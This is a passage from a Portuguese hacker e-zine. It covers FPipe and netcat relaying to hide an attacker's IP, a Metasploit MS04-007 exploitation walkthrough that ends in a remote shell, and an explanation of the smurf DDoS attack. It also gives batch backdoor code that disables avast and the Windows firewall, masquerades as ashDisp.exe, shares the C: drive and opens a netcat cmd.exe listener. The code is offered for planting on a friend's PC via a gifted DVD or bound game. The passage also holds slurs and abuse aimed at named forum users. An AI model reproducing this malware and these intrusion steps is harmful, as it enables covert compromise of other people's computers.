Apache’s mod proxy e varios outros, mas vamos nos concentrar no fpipe. Segue abaixo uma ajuda traduzida e adaptada por mim. FPipe v2.1 - TCP/UDP port redirector. Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com/ FPipe [-hvu?] [-lrs ] [-i IP] IP -?/-h - Exibe este texto de ajuda -c - Numero maximo de conexoes TCP permitidas. Padrao é 32 -i - Seta uma interface de rede (Redireciona pra qualquer seguimento) -l - Escuta um numeo de porta -r - Usado para designar uma porta em listenning no host remoto. -s - outbound source port number -u - Modo UDP -v - verbose mode Vamos la, este e o senario: Local Machine <----------> FPipe server <---------> Remote machine Inbound Outbound connection connection Voce quer acessar uma maquina da NAT que tem o endereço IP 192.168.1.1 na porta TCP 666, então voce faz isso no host na DMZ: C:\Documents and Settings\David>fpipe -l 289 -r 666 192.168.1.1 -vv FPipe v2.1 - TCP/UDP port redirector. Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com/ Listening for TCP connections on 0.0.0.0 port 289 Neste exemplo vou me conectar no meu proprio host utilizando uma porta que o netcat esta escutando. O procedimento e o normal viu galera, telnet 192.168.1.1 289 (meu host, "netcat"). Apos a conexao será exibido o seguinte: Listening for TCP connections on 0.0.0.0 port 289 Connection accepted from 192.168.1.1 port 1121 Attempting to connect to 192.168.1.1 port 1121 Pipe connected: In: 192.168.1.1:1121 --> 192.168.1.1:289 Out: 192.168.1.1:1122 --> 192.168.1.1:666 115 bytes received from outbound connection E lá no netcat: ===================================== Microsoft Windows XP [versão 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\David>echo Olha o shell ae gente!!! ===================================== Ou seja, shell do host da NAT. Analise as portas usadas com um netstat, no meu caso o resultado foi esse: C:\Documents and Settings\David>netstat -an -p tcp | find "ESTABLISHED" TCP 192.168.1.1:289 192.168.1.1:1121 ESTABLISHED TCP 192.168.1.1:666 192.168.1.1:1122 ESTABLISHED TCP 192.168.1.1:1121 192.168.1.1:289 ESTABLISHED TCP 192.168.1.1:1122 192.168.1.1:666 ESTABLISHED Veja outro exemplo: C:\Documents and Settings\Administrador>fpipe -l 888 -vv -r 425 192.168.1.1 FPipe v2.1 - TCP/UDP port redirector. Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com/ Listening for TCP connections on 0.0.0.0 port 888 //Esperando uma conexao TCP na porta 888 Connection accepted from 192.168.1.14 port 1087 //A Conexao do host 192.168.1.14 foi aceita na porta 1087 Attempting to connect to 192.168.1.14 port 1087 Pipe connected: In: 192.168.1.14:1087 --> 192.168.1.1:888 //O IP 192.168.1.14 acessou meu host na porta 888 Out: 192.168.1.1:1165 --> 192.168.1.1:425 //Aqui ele foi redirecionado para a porta 425 do host 192.168.1.1 123 bytes received from outbound connection Host 192.168.1.14: ===================================== Microsoft Windows XP [versão 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\David>echo Olha outro shell ae gente!!! ===================================== Olha de quem que o netcat pega o IP: C:\Documents and Settings\Administrador>nc -l -p 425 -vv -e cmd.exe listening on [any] 425 ... connect to [192.168.1.1] from Violator [192.168.1.1] 1165 Ou seja, o hacker se conectou na maquina que estava com o fpipe em escuta, e quando ele se conecta o netcat mostra que a conexao veio do PC que tava rodando o cano para a conexao e nao o IP do invasor (acredito que saber disso vai ser muito importante para voces :- ). Voce pode deixar algum script em batch compilado em aplicaçao fantasma no host do cara que sempre fique com uma porta em listening pelo fpipe e que te redirecione apos o acesso para um outro endereço IP quando voce se conectar nesta porta, voce pode ser redirecionado para outro host com o IP dele, tipo pra incriminar o cara, ou para dar uma segunda camada de segurança ao invasor. Basta usar um binder e juntar o script com algum joguinho e mandar para o cara que voce vai usar de ponte. Ou mande apenas o script com fake msg do winrar, dizendo algo do tipo: arquivo corrompido. Voce pode ate mesmo compilar ele e manda ele purinho. O script que se incializa pode ser escrito mais ou menos assim: Rem - Nao preciso de @echo off porque ele vai estar compilado em Ghost Application copy ponte.exe c:\ /y //Copia pro C: e substitui o arquivo ja existem sem perguntar attrib +H c:\ponte.exe //O attrib e o comando que define um atributo juntamente com os sinais + add - retirar reg add HKLM\software\microsoft\windows\currentversion\run /v ponte /t REG_SZ /d "c:\ponte.exe" /f //add no registro net stop sharedaccess //Desabilita o firewall do XP fpipe -l 8080 -s 1162 -r 21 X.X.X.X //Escuta na porta 8080, tenta abrir a porta 1162 que supostamente seria uma porta romdomica, pois o firewall deixa essas portas serem abertas sem alertar o usuario, porque essas portas normamente sao utilizadas quando voce abre o browser para acessar a internet, (quando essas tais portas se abrem a maioria dos firewalls as ignoram) e logo depois me redireciona para a porta 21 do host X.X.X.X, quando eu der um TCP Conect na porta 8080 eu sou redirecionado para o servidor de FTP do Host X.X.X.X e nao tenho o meu IP capturado, pois o IP que o host X.X.X.X vai logar e o do cara que to usando como ponte. Voce ficara impressionado em saber o que o tunelamento e capaz de fazer juntamente com o netcat, tunelar com shell reverso é uma pratica bastante interesante. Gostaria que postasem ideias com relaçao ao netcat e ao tunelamento, pois o netcat tambem nao se resume em port scan, sniffer e essas babozeiras que ta todo mundo acostumado a ler por ai, espero que posam avançar nos estudos destas duas ferramentas e em proximos textos mostrarei as magicas que eu sou capaz de fazer com essas ferramentas, espero que tenham gostado do meu post e falow. E como disse um "filho da puta frances" chamado "rog", o ssh tambem e interesante, porque com o ssh da para lançar o comando da ponte no proprio pc cliente (tendo autorizaçao no pc ponte é claro) huahuahauhHuahu!!! Aquele trouxa. Pra quem nao conhece o tal do rog, ele foi o cara que desenvolveu o cgi logger do Optix pro, ou seja, a parte mais tosca do trojan foi ele que desenvolveu, por isso ele se acha no direito de ficar falando merda pra todo mundo. Cara, te manca, tu nem "Brasileiro" é filho da puta, num te mete com brasileiro naum cara, gringo trouxa. Lammer é foda mesmo, o cara sai dizendo aos quatro cantos do mundo que fez o CGI logger do Optix, e depois posta em sites de segurança como remover o trojan. Voces ouviram o que eu disse? O cara ajuda os malucos a fazer e depois sair postando o "perigo" que o Optix representa. Filho da puta!!! Que cretino mais tosco meu irmao, esse seria o ultimo cara que me ajudaria no desenvolvimento de um trojan. Traira do caralho, e ainda e metido a mauricinho dizendo que fez dezenas de cursos superiores na franca e que ganha muito bem la fazendo so deus sabe o que com os computadores dos trouxas que o contratam. Esse sugeito nao sabe e de nada, convido todos voces a dar um pulinho no forum darkers e procurar um topico meu de nome: Super especial: Metodos de prevençao e reçao a ataque do tipo D.D.O.S O sugeito so da rata vei, num sabe nem os termos corretos e quer ser o gostoso do darkers, so porque deram algumas estrelinhas de outro pra ele. A unica coisa que o infeliz manja e em PHP e CGI, e mesmo assim so desenvolve porcarias. ----- C4p1Tul0 09 //--//--//--//--//--//--// METASPLOIT //--//--//--//--//--//--// ||============#||O ABRIGO DOS EXPLOITS||#=================#|| 6_BL4CK9_F0X6 Ao invés de você sair por ai procurando códigos de exploits para depois compilá-los, veja se ele não existe neste excelente repositório de exploits, me recuso a chamá-lo de scanner de vulnerabilidades, vale lembrar que os exploits normalmente são distribuídos em código fonte C ou Perl e para compilar a maioria deles você precisará ter um certo conhecimento em programação caso dê erro, mas fique tranqüilo, agora você não precisa se preocupar mais com isso quando for testar a segurança de sua rede, porque existe este excelente programa que faz tudo isso pra você e ainda por cima possui uma GUI e também possui um console pra quem gostar do lado obscuro por assim dizer dos programas (que e o que vamos utilizar), estou me referindo ao Metasploit Frameork, atualmente na versão 3.0, para usá-lo em sua forma mais simples basta colocar o IP do alvo e clicar em Launch Exploit e esperar o Shell, simples não acha? Agora vou demonstrar como essa fantástica ferramenta funciona para você checar a segurança de sua rede com todo o conforto que o metasploit pode lhe proporcionar, sem contar que o mesmo ainda disponibiliza varias otras subferramentas como farejadores de rede, etc. Vou utilizar a versao 2.7 do metasploit para Unix, mas tambem existem versoes dele para windows. Passei o nessus em um host na minha rede e o mesmo me forneceu um relatorio com diversas falhas neste host, dei uma picotada no log que o nessus gerou e extrai apenas a vulnerabilidade que iremos explorar, analise e veja o que a falha possibilita a um invasor: Synopsis : Arbitrary code can be executed on the remote host. Description : The remote Windows host has a ASN.1 library which is vulnerable to a flaw which could allow an attacker to execute arbitrary code on this host. To exploit this flaw, an attacker would need to send a specially crafted ASN.1 encoded packet with improperly advertised lengths. This particular check sent a malformed NTLM packet and determined that the remote host is not patched. Solution: http://www.microsoft.com/technet/security/bulletin/ms04-007.mspx Risk Factor : Critical / CVSS Base Score : 10 (AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N) CVE : CVE-2003-0818 BID : 9633, 9635, 9743, 13300 Other references : IAVA:2004-A-0001 Plugin ID : 12054 Repare na linha: Arbitrary code can be executed on the remote host Vamos agora botar a mao na massa e colocar o metasploit pra trabalhar, primeiramente entre no diretorio do metasploit com o comando cd diretorio (dã), agora vamos compilar o console que esta escrito em perl, ou seja: perl msfconsole, apos isso voce terá o seguinte resultado: Black_Fox@BlackMachine:~/Desktop/temp/framework-2.7$ perl msfconsole Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu) __. .__. .__. __. _____ _____/ |______ ____________ | | ____ |__|/ |_ / \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\ | Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || | |__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__| \/ \/ \/ \/ |__| + -- --=[ msfconsole v2.7 [158 exploits - 76 payloads] msf > Este é o shell do metasploit, agora vamos mecher um pouco nele. As traduções abaixo foram feitas por mim, por isso pode confiar hauhauhauah!!!. Digite help para obter uma lista com os comandos disponiveis, originalmente você terá uma descrição em ingles de comando comando, mas como eu já avia falado anteriormente, eu traduzi e fiz algumas adaptações no texto. msf > help Metasploit Framework Main Console Help ====================================== ? Exibe esta lista de comandos cd Muda o diretorio de trabalho exit Sai do console do metasploit help Exibe esta lista de comandos info Exibe detalhes do exploit ou informações do payload quit Sai do console do metasploit reload Recarrega exploits e payloads save Salva as configurações no disco setg Seleciona uma variavel de ambiente global show Exibe exploits e payloads disponiveis unsetg Remove uma variavel de ambiente global use Seleciona o exploit pelo nome version Exibe a versão do console Para ver os exploits disponiveis digite 'show exploits' msf > show exploits [Editei a lista, pois sao muuuuuuuitos exploits] 3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow Credits Metasploit Framework Credits afp_loginext AppleFileServer LoginExt PathName Overflow aim_goaway AOL Instant Messenger goaway Overflow altn_webadmin Alt-N WebAdmin USER Buffer Overflow apache_chunked_win32 Apache Win32 Chunked Encoding arkeia_agent_access Arkeia Backup Client Remote Access arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X) arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32) awstats_configdir_exec AWStats configdir Remote Command Execution backupexec_agent Veritas Backup Exec Windows Remote Agent Overflow backupexec_dump Veritas Backup Exec Windows Remote File Access backupexec_ns Veritas Backup Exec Name Service Overflow backupexec_registry Veritas Backup Exec Server Registry Access badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow bakbone_netvault_heap BakBone NetVault Remote Heap Overflow barracuda_img_exec Barracuda IMG.PL Remote Command Execution blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow bluecoat_winproxy Blue Coat Systems WinProxy Host Header Buffer Overflow msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow Vou setar o exploit que exploita falha no host remoto, ou seja: Nome interno do exploit Nome externo msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow Para selecionarmos este exploit digite: msf > use msasn1_ms04_007_killbill //Enter msf msasn1_ms04_007_killbill > //Exploit setado Agora vamos ver mais ajudas com relação a comandos do metasploit, pois quando estamos com um exploit setado a ajuda muda um pouco de figura, vamos ver o que vai aparecer de novo: Metasploit Framework Exploit Console Help ====================================== ? Exibe esta lista de comandos back Drop back to the main menu cd Muda o diretorio de trabalho check Perform vulnerability check exit Sai do console exploit Executa o exploit atual help Exibe esta lista de comandos info Exibe detalhes do exploit ou informações do payload quit Sai do console rcheck Perform vulnerability check reload Recarrega exploits e payloads rexploit Reload and exploit, for us tester types save Save configuration to disk set Seleciona uma variavel de ambiente temporaria setg Seleciona uma variavel de ambiente global show Exibe opções, avançado, payloads, ou alvos unset Remove a temporary environment variable unsetg Remove a global environment variable use Seleciona um exploit pelo nome version Exibe a versão do console Vamos obter informações de uso deste exploit, ou seja, quais os requerimentos necessarios para a execução do mesmo: msf > use msasn1_ms04_007_killbill msf msasn1_ms04_007_killbill >show options Exploit Options =============== Exploit: Name Default Description -------- ------ ------- --------------------------- optional SSL The target service uses SSL /Opcional required RHOST The target address /Requerido (obrigatorio) required RPORT 445 The target service port /Requerido (obrigatorio) required PROTO smb Protocol (smb or http) /Requerido (obrigatorio) Target: Windows 2000 SP2-SP4 + Windows XP SP0-SP1 Para podermos executar o mesmo obviamente que temos que selecionar o alvo (RHOST - Host remoto), a porta (RPORT - Porta remota), e para este exploit funcionar se faz necessaria a seleção de um protocolo (smb), agora vamos setar o payload, para ver uma lista de payloads disponiveis digite: msf msasn1_ms04_007_killbill > show PAYLOADS Metasploit Framework Usable Payloads ==================================== win32_adduser Windows Execute net user /ADD win32_bind Windows Bind Shell win32_bind_dllinject Windows Bind DLL Inject win32_bind_meterpreter Windows Bind Meterpreter DLL Inject win32_bind_stg Windows Staged Bind Shell win32_bind_stg_upexec Windows Staged Bind Upload/Execute win32_bind_vncinject Windows Bind VNC Server DLL Inject win32_downloadexec Windows Executable Download and Execute win32_exec Windows Execute Command win32_passivex Windows PassiveX ActiveX Injection Payload win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload win32_passivex_stg Windows Staged PassiveX Shell win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload win32_reverse Windows Reverse Shell win32_reverse_dllinject Windows Reverse DLL Inject win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject win32_reverse_ord Windows Staged Reverse Ordinal Shell win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject win32_reverse_stg Windows Staged Reverse Shell win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute win32_reverse_vncinject Windows Reverse VNC Server Inject .............. Para setar o payload, alvo, porta, protocolo e lançar o exploit, digite: msf msasn1_ms04_007_killbill >setg PAYLOAD win32_bind PAYLOAD -> win32_bind //PAYLOAD setado msf msasn1_ms04_007_killbill(win32_bind) > setg RHOST 192.168.1.16 RHOST -> 192.168.1.16 //Alvo setado msf msasn1_ms04_007_killbill(win32_bind)setg RPORT 445 RPORT -> 445 //Porta setada msf msasn1_ms04_007_killbill(win32_bind) >setg PROTO smb PROTO -> smb //Protocolo setado msf msasn1_ms04_007_killbill(win32_bind) >exploit //Lança o exploit [*]Starting Bind Handler. [*]Attempting to exploit target Windows 2000 SP2-SP4 + Windows XP SP0-SP1 [*]Got connection from 192.168.139.1:32794 <_> 192.168.139.16:4444 Microsoft Windows XP [versão 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> Shell obtido com sucesso. Isso prova que o metasploit é uma das melhores ferramentas para se testar a segurança de sua rede hoje, vale muito você gastar um tempinho mechendo nele, eu recomendo. Links para download Framework 3.0 Windows --------> http://framework.metasploit.com/msf/downloader/framework-3.0.exe Framework 3.0 Unix --------> http://framework.metasploit.com/msf/downloader/framework-3.0.tar.gz Framework 2.7 Windows --------> http://metasploit.com/tools/framework-2.7.exe Framework 2.7 Windows --------> http://metasploit.com/tools/framework-2.7.tar.gz Para obter informações com relação aos alvos do exploit (depois que o mesmo for setado): msf msasn1_ms04_007_killbill > show TARGETS Supported Exploit Targets ========================= 0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1 Para obter mais informações sobre a falha: msf msasn1_ms04_007_killbill > info msasn1_ms04_007_killbill Name: Microsoft ASN.1 Library Bitstring Heap Overflow Class: remote Version: $Rev: 3818 $ Target OS: win32, win2000, winxp Keywords: asn1 Privileged: Yes Disclosure: Feb 10 2004 Provided By: Solar Eclipse [GPLv2 License] Available Targets: Windows 2000 SP2-SP4 + Windows XP SP0-SP1 Available Options: Exploit: Name Default Description -------- ------ ------- --------------------------- optional SSL The target service uses SSL required RHOST The target address required RPORT 445 The target service port required PROTO smb Protocol (smb or http) Payload Information: Space: 1024 Avoid: 0 characters | Keys: noconn tunnel bind ws2ord reverse Nop Information: SaveRegs: esp ebp | Keys: Encoder Information: | Keys: Description: This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. References: http://www.osvdb.org/3902 http://www.phreedom.org/solar/exploits/msasn1-bitstring/ http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0818 http://www.milw0rm.com/metasploit/40 ----- C4p1Tul0 10 //--//--//--//--//--//--// //--//--//--//--//--//--// ||============#||Entendendo o smurf ||#==============#|| O meu ultimo topico no darkers 6_BL4CK9_F0X6 //--//--//--//--//--//--// //--//--//--//--//--//--// Quando o atacante faz um ataque do tipo smurf, sua estaçao irá emitir pacotes UDP, mais necessariamente pacotes ICMP echo request para toda a "rede alvo" usando um tipo de transmissão de dados chamada de broadcast, esse tipo de transmissão emiti pacotes de dados para toda a rede, nesse caso serão enviados pacotes ICMP echo request para os endereços de broadcast da rede que existem computadores que serão usados como piões para o ataque, este IP normalmente é o X.X.X.255, quando os piões recebem o pacote ICMP echo request imediatamente ele retornam pacotes ICMP echo reply ou melhor dizendo: retornam pings. Já que fiz um broadcast para mandar pacotes de requisição para os host piões, então todos iram mandar pacotes ICMP echo reply quase simultaneamente, mas só que ao invés de mandar os pacotes de resposta para o atacante (que lançou o broadcast), os dados vão ser enviados para o computador da vítima usando uma técnica chamada IP spoofing para fazer os piões acreditarem que quem fez a solicitação foi a vítima, assim fazendo com que o computador alvo do ataque receba muitos pacotes ICMP echo reply como resposta de uma solicitação que não fez, conseqüentemente não conseguindo processar todos os dados recebidos ocasionando o travamento do alvo. Existem muitos programas ótimos para realizar o smurf, os melhores são o WinSmurf e o Smurf2k. http://www.hunterhacker.xpg.com.br/smurf1.jpg Para se proteger desse ataque basta configurar seu firewall para nao responder a solicitaçao de eco de entrada e pronto, pois este ataque se aproveita do envio de ICMP echo request. Hoje eu estou feliz, ri muito porque um panaca la do forum do darkers disse que IPspoof so funciona em rede interna huahauhHuahUh!!! Trouxa!!!! Seu lammer nojento, espero que seu corpo queime eternamento no fogo do inferno, seu rato podre, escoria da sociedade, vai varrer o site do banco do brasil com o languard HuahUhauH Lammer!!! Tu consegue ate fazer bruteforce no FTP do banco do brasil se usar o X-Scan-v3.3, tu pode varrer todas as portas tranquilamente, tenta ae hUhauh, tenta quebrar o VNC do banco, vai correndo rato. Sua raça imunda acaba de ler uma coisa e mesmo sem saber o que vai fazer vai logo varrendo hosts, sem contar que mesmo sem saber da coisa ficam discutindo com quem entende dizendo besteira nos foruns. Seu filho da puta tosco, macaco imundo. Olhem a rata que esse vermezinho chamado Mateus deu la no meu topico Smurf. Porque eu odeio esse lammer: Parece estranho mesmo eu escrever sobre um lammer na minha zine, mas minha indignaçao foi porque esse mesmo lammer de tanto falar besteira fez despertar o meu chacra interior de raiva e eu comecei a menospreza-lo, esse mesmo idiota fez eu ser banido do forum do darkers, digamos que foi a gota dagua para o cuzao do reeves. ----- C4p1Tul0 11 //--//--//--//--//--//--// MEXT //--//--//--//--//--//--// ||============#||THE KING OF CALCULATORS||#==============#|| 6_BL4CK9_F0X6 //--//--//--//--//--//--// MEXT //--//--//--//--//--//--// Reparem bem que na maioria dos forums tem sempre um cara que posta uma calculadora uhauihauiahiau, e foda mesmo, os caras lascam tudo, nao vou mentir que quando comecei a mecher com C, comecei por uma calc, mas depois prometi para mim mesmo: Primeira aplicaçao............Nunca mais sera uma calculadora Uhauahgayg Meu primeiro code em perl foi um cadastrador de clientes, muito maneiro, mas para quem gosta de se basear ae pelas calcs vou sempre tar postando fonts de calcs ae pra galera ter como exemplo de code, tu veras calcs em varias linguagen, tais como, C, perl, Javascript e tals. Aviso para o curso de batch que ta vindo ae Como eu sempre arrumo um tempinho aqui resolvi fazer ae pra voces um calculadorazinha bastante simples, apenas para servir como base para aqueles que estao começando a programar em batch, daqui uns dias vou ta postando ae um curso mais que completo de programaçao em batch. Voce simplesmente ficara impressionado em saber o que um simples batch e capaz de fazer ehhe (diabinho), ja fiz um programa de bruteforce que exibe a senha do maluco, mapeia a unidade dele e faz muitas outras piruetas loucas. Atualmente desenvolvo em batch anti worms e malwares, que quando entram no sistema começam a levantar informaçoes sobre tudo da vitima e salva tudo em uma pasta recem criada na pendrive, ou seja, voce coloca a pendrive na USB com meu malware em autorun por 30 segundos no maximo, dae voce consegue informaçoes de ate 6 meses sobre a vitima eheheh Bendito seja o santo batch, faço coisas incriveis com arquivos em lote pessoal (como voces vao ver no capitulo backdoor camuflagem) e voces tambem vao aprender, so pesso que Aguardem.... @echo off title Calculadora simples v0.1 by 6_Bl4ck9_f0x6 :principal cls Echo Calculadora simples v0.1 by 6_Bl4ck9_f0x6 color a echo. & echo. echo Somar = 1 echo Dividir = 2 echo Subtrair = 3 echo Multiplicar = 4 echo Calcular Cubo = 5 echo. & set /p choice=Digite um numero [Para setar o operador]: if %choice% EQU 1 (goto Somar) if %choice% == 2 (goto Dividir) if %choice% EQU 3 (goto Subtrair) if %choice% == 4 (goto Multiplicar) if %choice% EQU 5 (goto Cube) IF %ERRORLEVEL% GEQ 6 goto Ops IF %ERRORLEVEL% LSS 1 goto Ops :Somar cls echo Este e o seu operador: + echo. & set /p numero=Digite o primeiro numero: set /p numeroD=Digite o segundo numero: set /a somar=%numero% + %numeroD% echo. & echo %numero% + %numeroD% = %somar% & echo. pause & goto principal :Dividir cls echo Este e o seu operador: / echo. & set /p numero=Digite o primeiro numero: set /p numeroD=Digite o segundo numero: set /a multiplicar=%numero% / %numeroD% echo. & echo %numero% / %numeroD% = %multiplicar% & echo. pause & goto principal :Subtrair cls echo Este e o seu operador: - echo. & set /p numero=Digite o primeiro numero: set /p numeroD=Digite o segundo numero: set /a subtrair=%numero% - %numeroD% echo. & echo %numero% - %numeroD% = %subtrair% & echo. pause & goto principal :Multiplicar cls echo Este e o seu operador: * echo. & set /p numero=Digite o primeiro numero: set /p numeroD=Digite o segundo numero: set /a multiplicar=%numero% * %numeroD% echo. & echo %numero% * %numeroD% = %multiplicar% & echo. pause & goto principal :Cube cls echo Calculo de cubo & echo. set /p numero=Digite o primeiro numero: set /p numeroD=Digite outro numero: set /p other=Agora o ultimo numero: set /a calculoC=%numero% + %numeroD% + %other% echo. & echo %numero% + %numeroD% + %other% = %calculoC% & echo. & pause goto principal :ops cls echo. echo EI CARA OPERADOR INVALIDO echo. echo Para continuar pressione qualquer tecla... & pause > nul goto principal ----- C4p1Tul0 12 [Texto escrito por mim originalmente para a porra do darkers] |=--------------------=[BackDoor Camuflagem]=----------------------------=| |=------------------------||for avast! antivirus||--------------------------------=| | -+ BY +- | |=--------------=[6_Bl4ck9_f0x6 ]=-------------------=| (Minha ideia recente) Ei, ei, ei, feliz natal, ops, ho! ho! ho!... é um negocio assim...?...Bah! Deixa pra lá, ei galera alguém pode me dizer se os Hackas comemoram o natal? Putz, ninguém ta festejando por aqui, chamei os caras, mas preferem ficar na frente do samsung se bronzeando, deixa queto e vamos logo falar de uma nova coisinha interesante que pensei aqui, vamos a historia de hoje: Era uma vez um garoto que queria injetar um backdoor baseado no netcat (por ser indetect) em um sistema de um amigo que num tava querendo lhe dar (gratuitamente) os videos do pride (é esse mesmo que voce ta pensando, lutas e tals, "finado" ryan grace) para o mesmo dar uma olhada na pancadaria em pleno natal, dae o que foi que esse rapaz fez? Abriu o portão de casa (sem camisa ainda), com o seu velho cigarrinho na boca e uma imensa cara de pau, discaramente ele bateu na porta do vizinho e quando o mesmo apareceu ele falo: - Feliz natal vizinho, trouxe uns videos de sacanagem para voce assistir cara. Deu um presente de natal para esse amigo. Era um DVD recheado de filmes de sacanagem devidamente comprimidos com o KGB (ou seja, muitos) e um trojan hauahuha!!! Mas eu tinha que fazer bem feito né galera, pois o cara (confiando muito nos amigos) todo santo dia olha o registro para ver se tinha algo suspeito se iniciando (traumatizado com o pessoal), putz (pensei), dae complica. Antes de ir bater no portão da casa dele pensei, pensei, pensei, e pensei. Nessa brincadeira passei 10 minutos, entre cigarros e Final Fantasy IX hauhauha!!! derrepente....Tchanram!!! Bingo!!! pensem comigo: O cara todos os dias olha lá no msconfig e ve sempre a mesma coisa: Item de inicialização | Comando | Local ashdisp.exe Path do ashdisp.exe HKLM\Software\Microsoft\windows\currentversion\run Ou seja, o cara sempre via o componente do avast, sacou? Então o que temos que fazer é transformar o nosso backdoor no avast. Como? Assim: REM Compile este font com o nome Camuflagem.exe REM Certifiquese de que a unidade Master da vitima é a C: mesmo, REM se não souber use a variavel de amgiente %PROGRAMFILES% taskkill /f /im ashDisp.exe cls taskkill /f /im ashMaiSv.exe cls taskkill /f /im ashServ.exe cls taskkill /f /im ashWebSv.exe cls taskkill /f /im aswUpdSv.exe cls copy Camuflagem.exe "C:\Arquivos de programas\Alwil Software\Avast4" reg delete HKLM\Software\Microsoft\windows\currentversion\run /v avast! /f del "C:\Arquivos de programas\Alwil Software\Avast4\ashDisp.exe rename "C:\Arquivos de programas\Alwil Software\Avast4\Camuflagem.exe" ashDisp.exe reg add HKLM\Software\Microsoft\windows\currentversion\run /v avast! /t REG_SZ /d "C:\Arquivos de programas\Alwil Software\Avast4\ashDisp.exe" Copy D:\netcat\*.* %systemroot%\system32 net stop sharedaccess net share c=c:\ net start telnet ---- > Se tiver suporte (obvio) nc -L -vv -p 12345 -e cmd.exe Cria ae um autorun e compilar os codigos em batch ae em cima e complementa o CD com algumas paradas que a vitima goste, assim ela ficará tão impressionada com o presente que nem se quer vai pensar que tem um trojan no CD, tipo cara: O meu amigo é fisurado em muié, dae intupi um DVD de sacanagem e dei, o cara mesmo que soubesse que tinha trojan num ia ta nem ae Huahuahauh!!!! Este é um Backdoor bastante interesante se tratando da sua indetectabilidade em alguns casos, essa palavra existe? Que se foda eu não quero nem saber, vou descrever as suas funções e escrever um pequeno manual do usuario para voces seguirem, vamos lá. Primeiramente eu gostaria de dedicar esse backdoor a minha amada Gracinha por ela sempre limpar as cinzas de cigarro que insistem em cair no meu quarto por causa dos idiotas cegos que frequentam a minha casa e chutão a droga do cinzeiro huahauhau!!!!. Camuflagem é feito para o avast! Antivirus mas pode ser adptado tranquilamente para qualquer outro antvírus ou programa que se inicie na maquina. vou dar exemplo do que estes simples codigos acima são capazes de fazer apenas compilados colocados em um CD e evidentemente colocados no drive da vitima. A rota A rota que o Camuflagem segue é a seguinte: No momento que o cd que esta infectado com o Camuflagem entrar no drive da vitima ele matará o antvírus (pra ele num piar) se copiará para o diretorio padrão do avast e lá ele vai deletar a chave de registro do ashdisp.exe, que é um componente do avast que cria uma chave no registro para se inicializar na maquina, este componente possui um valor sequêncial de nome avast!. Logo em seguida ele deletará o ashdisp.exe e se renomeará com o nome ashdisp.exe e criará outra chave no registro com o mesmo nome do valor da chave deletada para inicialo toda vez que a vitima se logar na maquina, copiará os componentes do netcat que esta no cd para o diretorio do sistema, matará o firewall do windows (pra ele também num piar), compartilhará a unidade c: do cara (meu vizinho ta no mesmo ISP que eu hauhauha), abrirá a porta telnet do PC dele, e vai abrir a porta 12345 com o netcat (homenagem ao netbus), ufa!!!. Assim quem for no msconfig vai ver o seguinte: Item de inicialização | Comando | Local ashdisp.exe Path do ashdisp.exe HKLM\Software\Microsoft\windows\currentversion\run Eita bichim pra se esconder huahauhau!!!! Alguém ae diz que isso ae em cima é um trojan? Aplicação Fantasma A vitima não desconfiará que o avast é na verdade um trojan camuflado. Mas infelizmente ele não esta perfeito falta alguns retoques, tenha em mãos um compilador de batch chamado Quick Batch File Compiler estou usando o versão 2.1.5.0, esta ferramenta será bastante util pois se a vitima utilizar algum software que exibe os icones dos itens de inicialização da maquina ele será facilmente detectado, pois nosso Backdoor não tem um icone por enquanto, por isso e por mais alguns motivos que utilizaremos o Quick Batch File Compiler. Importe o seu Batch com o codigo fonte acima para o Quick Batch em open (obvio), logo depois va em Project > Options. Na guia General marque a caixa de texto Ghost Application ou Aplicação fantasma, se a sua versão for em inglês (eu acho que só tem em inglês) aqui vai uma tradução: This type application will not create any windows. May be useful for 'Silent' installation. Este tipo de aplicação não ira criar nenhuna janela. Talvez seja util para uma instalação silenciosa. Huhuhuhuhu!!! UiUiUI hauahuha, "sem console". Então isso significa que nos podemos rodar em modo oculto sem aquele console troncho do DOS dizendo que o netcat esta escutando em uma porta, de um OK, agora vá na guia Custom Resources > Application Icon e importe o icone do ashdisp.exe original, calma, calma, eu vou ensinar como se obter qualquer icone de qualquer executavel mas para isso voce precisa da nossa ultima ferramenta de trabalho, o programa se chama Resource Hacker pode ser encontrado em: http://www.hunterhacker.xpg.com.br/15.rar Com esse programa podemos decompilar e recompilar um executavel com os codigos auterados, para esse ato se da o nome de engenharia reversa, mas nesse caso vamos pegar apenas o icone (por hora). Com o programa em mãos abra-o (dã) e importe o arquivo executavel que deseja obter o ícone, no caso é o ashdisp.exe. Ja dentro do programa vá na mini-pasta onde está escrito icon e explore a mesma até encontar as imagens de icones, dai e só clicar com o botão direito e salvar o ícone. Com o ícone ja salvo agora importe-o com o Quick Batch e compile o seu 